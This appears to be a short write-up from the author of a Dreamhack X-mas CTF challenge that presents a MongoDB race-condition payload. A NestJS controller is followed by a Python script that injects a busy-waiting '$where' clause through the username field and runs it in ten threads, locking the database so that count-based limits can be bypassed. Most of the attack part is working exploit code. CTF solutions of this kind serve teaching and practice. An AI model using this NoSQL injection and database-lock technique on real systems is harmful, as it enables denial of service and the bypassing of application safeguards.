MongoDB Race Condition payload
Information
Target: MongoDB
Vulnerability: Race Condition
Desc
MongoDB Race Condition Attack with db lock.
Example
Code
1
2
3
4
5
// admin.controller.ts
@Post('list')
async getFlagList(@Body() listDto: ListDto): Promise<FlagDocument[]> {
return await this.adminService.getFlagList(listDto.username);
}
Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import threading
import json
# Logic Vulnerability - Database Lock
def lock():
res = requests.post(f"{url}/admin/list", headers=auth,
json={"username": '''admin", "$or": [{"dummy": "dummy"},{"$where": "date=new Date();do{cur=new Date();}while(cur-date<5000) + 1 || true"}], "":"'''})
print(res.text)
threads = []
for i in range(10):
thread = threading.Thread(target=lock)
threads.append(thread)
thread.start()
It takes a long time to count the number of existing documents in the DB, so logic such as number restrictions can be bypassed.
Comment
This is part of the solution for the challenge I made. ( For dreamhack X-mas CTF )
Challenge Link
Ref
This post is licensed under CC BY 4.0 by the author.